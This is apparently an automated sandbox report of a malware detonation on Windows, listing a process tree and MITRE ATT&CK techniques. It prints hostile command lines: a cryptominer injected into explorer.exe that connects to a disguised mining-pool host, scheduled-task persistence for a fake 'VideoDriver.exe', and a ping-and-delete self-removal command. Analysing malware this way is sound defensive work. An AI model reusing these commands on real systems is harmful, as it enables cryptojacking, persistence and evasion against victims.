C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:10052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵PID:9172
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:8252
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:10444
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:10752
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:10704
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:10908
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:6600
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:10948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵PID:5344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\328.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\328.exe"2⤵PID:8676
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:8536
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:9288
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4384
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5896
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5192
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8896
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8568
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1364
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8492
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8760
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:724
-
C:\Users\Admin\AppData\Roaming\vvefthhC:\Users\Admin\AppData\Roaming\vvefthh1⤵PID:10360
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:11116
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10164
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10144
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x30c1⤵PID:5864
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9932
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5244
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2744
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6508
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:9260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7336
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4124
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3104
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6060
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1